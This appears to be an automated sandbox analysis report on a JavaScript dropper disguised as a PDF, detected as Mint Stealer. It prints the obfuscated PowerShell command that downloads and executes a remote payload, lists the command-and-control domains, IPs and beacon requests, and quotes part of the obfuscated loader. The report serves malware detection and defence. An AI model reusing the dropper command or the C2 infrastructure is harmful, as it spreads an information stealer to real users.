Windows Analysis Report
_DRP12938938231_PDF.js

Overview

General Information

Sample name: _DRP12938938231_PDF.js
Analysis ID: 1556633
MD5: b05ee915cdbdb359f19b8e42acebaf48
SHA1: f8a4866dd81dde78f6f1a1e11a9594fcbce71612
SHA256: 41facb3e96a81c04259c40c2170e6dc53047838e0f918dba889fc6510bc4374d
Infos:

Detection

Mint Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mint Stealer
Creates processes via WMI
Loading BitLocker PowerShell Module
Obfuscated command line found
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64native
  • wscript.exe (PID: 7552 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • conhost.exe (PID: 7372 cmdline: conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt) MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 1796 cmdline: powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 1796
Rule: JoeSecurity_MintStealer_1
Description: Yara detected Mint Stealer
Author: Joe Security

    System Summary

    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5108, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", ProcessId: 7552, ProcessName: wscript.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5108, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", ProcessId: 7552, ProcessName: wscript.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt), CommandLine: powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; 
$jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt), ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 7372, ParentProcessName: conhost.exe, ProcessCommandLine: powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt), ProcessId: 1796, ProcessName: powershell.exe
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-11-15T18:23:48.092606+0100 | 2057063 | 1 | A Network Trojan was detected | 192.168.11.20 | 49763 | 206.188.196.25 | 80 | TCP
    2024-11-15T18:23:51.210209+0100 | 2856654 | 1 | A Network Trojan was detected | 192.168.11.20 | 49764 | 206.188.196.37 | 80 | TCP
    2024-11-15T18:23:50.224181+0100 | 2859003 | 1 | Domain Observed Used for C2 Detected | 192.168.11.20 | 56619 | 1.1.1.1 | 53 | UDP


    AV Detection

    Source: http://gidcldeaccadneh.top, Avira URL Cloud: Label: malware
    Source: _DRP12938938231_PDF.js, ReversingLabs: Detection: 15%
    Source: Binary string: m.Core.pdb source: powershell.exe, 00000003.00000002.79918722425.0000016D428AE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000003.00000002.79920045431.0000016D42C41000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000003.00000002.79920045431.0000016D42BCD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.79922477696.0000016D42F16000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.79920045431.0000016D42C41000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000003.00000002.79921044319.0000016D42C8E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.79921813941.0000016D42CFE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb` source: powershell.exe, 00000003.00000002.79920045431.0000016D42C41000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000003.00000002.79921813941.0000016D42CFE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.79922477696.0000016D42EE0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.79920045431.0000016D42BCD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79921044319.0000016D42C87000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: *n.pdb source: powershell.exe, 00000003.00000002.79918722425.0000016D428AE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbm source: powershell.exe, 00000003.00000002.79923029249.0000016D42F2C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ows\System.Core.pdb`8 source: powershell.exe, 00000003.00000002.79918722425.0000016D428AE000.00000004.00000020.00020000.00000000.sdmp

    Software Vulnerabilities

    Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

    Networking

    Source: Network traffic, Suricata IDS: 2859003 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.11.20:56619 -> 1.1.1.1:53
    Source: Network traffic, Suricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.11.20:49763 -> 206.188.196.25:80
    Source: Network traffic, Suricata IDS: 2858291 - Severity 1 - ETPRO MALWARE TA582 CnC Checkin : 192.168.11.20:49763 -> 206.188.196.25:80
    Source: Network traffic, Suricata IDS: 2856654 - Severity 1 - ETPRO MALWARE TA582 CnC Checkin : 192.168.11.20:49764 -> 206.188.196.37:80
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
    Source: Joe Sandbox View, IP Address: 206.188.196.37
    Source: Joe Sandbox View, ASN Name: DEFENSE-NETUS
    Source: global traffic, HTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: sfibhzu3ubhza.top Connection: Keep-Alive
    Source: global traffic, HTTP traffic detected: GET /uyo2kijx89htr.php?id=computer&key=58597074642&s=mints21 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: gidcldeaccadneh.top Connection: Keep-Alive
    Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
    Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><span equals www.youtube.com (Youtube)
    Source: global traffic, DNS traffic detected: DNS query: sfibhzu3ubhza.top
    Source: global traffic, DNS traffic detected: DNS query: gidcldeaccadneh.top
    Source: global traffic, DNS traffic detected: DNS query: www.google.com
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$g31r4qoblma59n7/$ka2f95t10y7xcsp.php?id=$env:computername&key=$fdnjboswy&s=mints21
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
    Source: powershell.exe, 00000003.00000002.79917995342.0000016D427F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: powershell.exe, 00000003.00000002.79917995342.0000016D427F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gidcldeaccadneh.top
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gidcldeaccadneh.top/uyo2kijx89htr.php?id=computer&key=58597074642&s=mints21p
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
    Source: powershell.exe, 00000003.00000002.79910993215.0000016D3A522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79919565751.0000016D42B84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sfibhzu3ubhza.top
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sfibhzu3ubhza.top/1.php?s=mints218
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79919565751.0000016D42B84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A8F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
    Source: powershell.exe, 00000003.00000002.79921044319.0000016D42C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.w
    Source: powershell.exe, 00000003.00000002.79917995342.0000016D427F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A7BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A6CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.comh
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
    Source: powershell.exe, 00000003.00000002.79910993215.0000016D3A522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000003.00000002.79910993215.0000016D3A522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000003.00000002.79910993215.0000016D3A522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A6CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79919565751.0000016D42B84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
    Source: powershell.exe, 00000003.00000002.79921813941.0000016D42CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
    Source: powershell.exe, 00000003.00000002.79910993215.0000016D3A4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24h
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A7BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A6CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
    Source: powershell.exe, 00000003.00000002.79910993215.0000016D3A522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000003.00000002.79917995342.0000016D427F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B39B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/celebratin
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2BF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/celebrating-the-kayak-6753651837110586-2x.png
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1

    System Summary

    Source: C:\Windows\System32\wscript.exe, COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
    Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_00007FFCF414A7A2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_00007FFCF41499F6
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_00007FFCF4132DD2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_00007FFCF41325DA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_00007FFCF413D6AD
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_00007FFCF413235A
    Source: _DRP12938938231_PDF.js, Initial sample: Strings found which are bigger than 50
    Source: classification engine, Classification label: mal100.troj.expl.evad.winJS@4/5@3/3
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmpm5aiq.jad.ps1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $b1gsm9ntck4h507.(([system.String]::new(@((405-338),(1368-(9095-7838)),(268800/2400),(1726-1605),(22848/272),(-6863+(-2950+9924))))))( $qk3t4vcxwfd9gb6 ) $b1gsm9ntck4h507.((-join (@((-4679+(2017050/425)),(-43+151),(-3835+(9923-5977)),(7690-7575),(-4684+4785))| ForEach-Object { [char]$_ })))()$smhw5bovtk7cz9j.(([system.String]::new(@((-4801+4868),(10033-9925),(69597/627),(631810/(7227-1733)),(586810/5810)))))()[byte[]] $z7unxof9wj6ycia = $qk3t4vcxwfd9gb6.((-join (@((-7159+7243),(8998-(11154-2267)),(-7255+(-2470+9790)),(-8036+(8682-532)),(531012/(3990+(-891+(-2861+4420)))),(-3403+(-1971+5471)),(4323-(1093+3109)))| ForEach-Object { [char]$_ })))() $mwox20rhsqkpul8=$z7unxof9wj6ycia return $mwox20rhsqkpul8}[System.Text.Encoding]::ascii.(([system.String]::new(@((8440-8369),(315524/(2173+951)),(62756/(-8050+(10853-2262))),(-5175+5258),(786132/6777),(274170/(-856+(8570-5309))),(5617-5512),(146080/1328),(4213-(2590+1520))))))((yxc4fwklvgno53qhtd7zsp8i10a "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
